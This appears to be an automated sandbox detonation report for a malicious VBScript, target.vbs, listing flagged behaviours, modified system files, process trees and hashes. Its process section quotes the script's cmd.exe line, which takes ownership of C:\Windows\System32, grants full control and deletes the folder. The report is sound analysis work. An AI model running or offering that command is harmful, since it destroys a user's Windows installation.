Analysis Overview
score
8/10
SHA256
dc83fb002acfc2179b1e82046f5827f14a5ed2bd58503403155b0cef21f89533
Threat Level: Likely malicious
The file target.vbs was found to be: Likely malicious.
Malicious Activity Summary
Drops file in Drivers directory
Possible privilege escalation attempt
Manipulates Digital Signatures
Loads dropped DLL
Checks computer location settings
Modifies file permissions
Drops file in System32 directory
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-05-25 16:19
Signatures
N/A
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-25 16:19
Reported
2024-05-25 16:21
Platform
win10v2004-20240508-en
Max time kernel
148s
Max time network
149s
Command Line
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\target.vbs"
Signatures
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\hidusb.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\http.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\rdpbus.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\tdx.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\amdppm.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\msfs.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\mslldp.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\msquic.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\Ndu.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\npfs.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\rteth.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\storahci.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\dfsc.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\watchdog.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\srv2.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\csc.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\rspndr.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\srvnet.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\Vid.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\VR7DGM~1.SYS | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\hidclass.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\gpuenergydrv.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\null.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\storqosflt.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\vhdmp.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\drmk.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\mrxsmb.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\dxgmms2.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\pacer.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\kdnic.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\cdrom.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\ks.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\usbehci.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\usbhub.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\afd.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\dxgkrnl.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\HdAudio.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\kbdclass.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\mouclass.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\mssmbios.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\Rtnic64.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\wcifs.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\cldflt.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\Diskdump.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\hidparse.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\i8042prt.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\ksthunk.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\mmcss.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\mouhid.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\portcls.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\afunix.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\monitor.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\netbt.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\nsiproxy.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\lltdio.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\cimfs.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\hdaudbus.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\tdi.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\vwififlt.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\cdfs.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\beep.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\ndiscap.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\PEAuth.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\rdbss.sys | C:\Windows\System32\cmd.exe | N/A |
Manipulates Digital Signatures
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\wintrust.dll | C:\Windows\System32\cmd.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\cdpsvc.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\dhcpcsvc6.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\cdp.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\fwpolicyiomgr.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\WaaSAssessment.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winevt\Logs\MI03A7~1.EVT | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winevt\Logs\MIA934~1.EVT | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\TileDataRepository.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\computenetwork.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\umpoext.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\AudioSrvPolicyManager.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\StartTileData.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\PhotoMetadataHandler.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\sppsvc.exe | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\tdh.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\ubpm.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\BluetoothApis.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\cryptxml.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\dpapi.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\en-US\combase.dll.mui | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Windows.Security.Authentication.Web.Core.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\nlaapi.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\themeservice.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\cscobj.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\daxexec.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\en-US\win32spl.dll.mui | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\lmhsvc.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winevt\Logs\SYSTEM~1.EVT | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\ncryptsslp.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Windows.CloudStore.Schema.Shell.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\wlidprov.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\en-US\crypt32.dll.mui | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\linkinfo.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Windows.UI.Xaml.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\config\BBI.LOG2 | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\ELSCore.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\NfcRadioMedia.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\usermgrcli.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\wuapi.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\catroot2\{F750E~1\catdb | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\DWrite.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winevt\Logs\MI6343~1.EVT | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\vssapi.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\wlanapi.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\dllhost.exe | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\localspl.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\RpcRtRemote.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\SebBackgroundManagerPolicy.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winevt\Logs\MI4C58~1.EVT | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\en-US\edgehtml.dll.mui | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\vertdll.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winevt\Logs\MI167B~1.EVT | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\WPTaskScheduler.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\config\SYSTEM~1\AppData\Local\MICROS~1\Windows\WebCache\WEBCAC~1.JFM | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\HrtfApo.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\en-US\elscore.dll.mui | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\fltLib.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\usbmon.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Windows.UI.Input.Inking.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winevt\Logs\MIDE4D~1.EVT | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\INPUT~1.INF\hidclass.sys | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\msdelta.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\win32kbase.sys | C:\Windows\System32\cmd.exe | N/A |
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2552 wrote to memory of 3560 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe |
| PID 2552 wrote to memory of 3560 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe |
| PID 3560 wrote to memory of 3588 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\takeown.exe |
| PID 3560 wrote to memory of 3588 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\takeown.exe |
| PID 3560 wrote to memory of 1640 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\icacls.exe |
| PID 3560 wrote to memory of 1640 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\icacls.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\target.vbs"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c takeown /f C:\Windows\System32 /r /d y && icacls C:\Windows\System32 /grant administrators:F /t && rmdir /s /q C:\Windows\System32
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32 /r /d y
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32 /grant administrators:F /t
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 52.111.229.43:443 | tcp | |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.173.189.20.in-addr.arpa | udp |
Files
C:\Windows\System32\netprofm.dll
| MD5 | fb9d4949ca739ff6ae9ff9e43809ad7d |
| SHA1 | 59f3d1cbd504170a0de4f6ae4b5e31b7beedb8f0 |
| SHA256 | d8e0e9f86c41f8b926e5e6f9ff2952a994b24f5cb36d4fc4ae9badd06ef6dc90 |
| SHA512 | b1ef2f4913033519771d8b75953e93ac3249ac8b3f5028eb7f65d8d0b8a3f0e11aab0da7454d463459e1c7517211d8fe0dbf1c68bd8e47807f921b82c504642c |
C:\Windows\System32\OnDemandConnRouteHelper.dll
| MD5 | 1f009de6a013a282d07436241512c056 |
| SHA1 | f0d37e1e76a199135e00c0a36b154b191a0950a9 |
| SHA256 | c897c345c3bcf3e96589a0feeea8b6d26cf33c091ac3ee2162dd27f8a79c3ff5 |
| SHA512 | 57971d5df5bd9fad066378b280898e1f6e074805cc765448b99409550f97d74bf5bbd11e48e28e53f22be69cd9cd0ff58caa1e92f94fed7cbb4cd45c8f0c4d37 |
C:\Windows\System32\webio.dll
| MD5 | 743dbafa395cf6a3edbddc785b3903b7 |
| SHA1 | 7102353adab408fa68ccf1632fe8b33096b7e9d5 |
| SHA256 | a0572142ce2d871319eec032cfc9397a3531dfadaa6c836ee0070878409bde94 |
| SHA512 | 15fdb766c1d9ad6b8a7be94042235fa87d892d4381055e9af2387fcbba8e294fe0160d74b40f0875992ffba98d3505e874ab946b5e2e68e2a46510bb84f62323 |
C:\Windows\System32\dhcpcsvc.dll
| MD5 | 912357f8e08213ba9cea37721b5ed46b |
| SHA1 | 9ac131aba943b6e80ee4b9ce9b39f943d82be583 |
| SHA256 | 691a7aff42d558fac26f2a9de6b47d7596b130e730597dc3aff6025cb484d4a1 |
| SHA512 | 7b87471adea7a0ca01097d0520c6f62c2e56fc7519fc436e5b48ab9c51df108834040ac15079a9a23e478c486ce7cb21b1b92a02f4c1ffe7b5ace6839437b253 |
C:\Windows\System32\dhcpcsvc6.dll
| MD5 | 394fb739c0f202fd65b0fea640d192f6 |
| SHA1 | bee425e28c99fe5b27faf3aaed0be0ea582ef7a5 |
| SHA256 | ced3c74f4960e26b648ec5360fe6b1ce47ed4f7a203d8c9798b450e8346b698e |
| SHA512 | 86660097ce8f692c7eae9555a90983e9f8f9463b469286e2d0f3fc7a628370196f60ff9a639ec9bd0eada1c94ca9ce39a714df3cf1c985b23e5f23d2f2034667 |
C:\Windows\System32\nsi.dll
| MD5 | 3bacc52f844ea1b30b8ef8ba0d08bf0d |
| SHA1 | 031070c5ae780472e409f1e49ddde124849dfa45 |
| SHA256 | 21293c3d3ba83ccc45135f33d2c70bffae7a347e9f0b9fd556622cef99291923 |
| SHA512 | c8befa3d89234a68754683299e3c63f7b0c4465743d07ed48cecc5e0c34b9c4756f71ab29695790b7cacc382f7f9cca4b3111f9717694e4518567300920b30b8 |
C:\Windows\System32\winnsi.dll
| MD5 | c552b64bad90764055c33e68ec8250f9 |
| SHA1 | 5a52e89c3e290eadf41c3b5babf3b88bc0087299 |
| SHA256 | 4824fce965b9dec8d78842cdc3ebcdf8d2d2ed15de05d5007fb18c1b2de79e11 |
| SHA512 | 369d86b338c477f6706e80457d34abb7a0be916cba5e90d2bad664e7b5c66eb8841c2c36ca6abf70ce30bc21e23f4c63701518b3f3ff9a38b046a25eafa72c98 |
C:\Windows\System32\IPHLPAPI.DLL
| MD5 | 567a217405f41caea18f4bab50d480fd |
| SHA1 | 90f870f43852b3fd62110692030bd20887777c0e |
| SHA256 | 41f7a696a02b5dcba85e12a4999423bdebb1215662059adae955f8081e3ffa78 |
| SHA512 | a63fb148b5db3a5738142254840e007ffab7139ed2e7a672446f613e83ee8731bcad830c860e5523f69113fea938f8bb5a59147ea641bc799aff16200d90cb00 |
C:\Windows\System32\mswsock.dll
| MD5 | 89ca286e36756dd0dde53acd953f44dc |
| SHA1 | cbd9fd0961f47398df85ae5d89d895c3737106db |
| SHA256 | 055f34466511dbeba4f082b110216ce9c1c7f056d4f1440d62d5442971a7b1cc |
| SHA512 | 341051e1353eb7ea8e8b2bd2783ff1da76922fa3513db524114bb52925550dc5c4ca92c59938de498514ad696310f7e7105ba34e8340efcd2fb2f3d80cf09410 |
C:\Windows\System32\npmproxy.dll
| MD5 | 4476ab6612b200ceb6957ff436e10877 |
| SHA1 | d56614e23a02d7939b165f44c8802b7da7196a40 |
| SHA256 | 7ca45c539218d4a186ee520c4afc29a931a34b2ed83fe10e3b8b23132e2ce520 |
| SHA512 | 3b12e9265ae3b57193ca678612b1c7e2004077bdef8fda1b050a451f53bb612baeba6f89aa1327a7bc4614d66b67ffc14475f4e41204d8cc3947fa51f0ef8c29 |
C:\Windows\System32\winhttp.dll
| MD5 | 9a00e598d3dd0aea191abaf6b6825187 |
| SHA1 | 0bb2af1b1edb22cb65398e3739e1863378b83d32 |
| SHA256 | dc62a2ed8778c75b29e5be10092cfa4aecfd6f7bffdda031152f0cad704d5bca |
| SHA512 | dac9e1974a71b6d580a65062b7d7d0e17edf82f5eb3fe458c8ba7f39052fe82f9346874d7fc54f2fe523f05b0239a1c0b1eb99545a3185a8cb493b0094e50e92 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-25 16:19
Reported
2024-05-25 16:21
Platform
win7-20240419-en
Max time kernel
119s
Max time network
120s
Command Line
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\target.vbs"
Signatures
Manipulates Digital Signatures
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\wintrust.dll | C:\Windows\System32\cmd.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| N/A | N/A | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| N/A | N/A | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| N/A | N/A | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\comdlg32.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\FXSAPI.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\mfplat.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\shlwapi.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\imagehlp.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\sxs.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winevt\Logs\MICROS~1.EVT | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\cscapi.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\normaliz.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\wbem\wbemprox.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\usp10.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\api-ms-win-downlevel-advapi32-l2-1-0.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\FWPUCLNT.DLL | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\syncui.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\usbmon.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\webservices.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\api-ms-win-downlevel-advapi32-l1-1-0.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\cfgmgr32.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\C_949.NLS | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\en-US\bthprops.cpl.mui | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\gdi32.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\7B296F~2.C74 | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\config\SECURI~2.LOG | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winevt\Logs\MICROS~4.EVT | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\wininit.exe | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\fveapi.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\netapi32.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\tbs.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\inetpp.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\nsi.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\wbem\NCProv.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\bitsperf.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\config\TxR\{01688~2.REG | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\gameux.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\framedynos.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\netutils.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\sfc_os.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Syncreg.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winevt\Logs\MI7771~1.EVT | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\batmeter.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\snmpapi.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\TSpkg.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\esent.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\netman.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\imapi2.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\wbem\repdrvfs.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\WindowsCodecs.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\ubpm.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\config\RegBack\SAM | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\msxml6r.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\netjoin.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\psapi.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\xmllite.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\oleacc.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\pcwum.dll | C:\Windows\System32\cmd.exe | N/A |
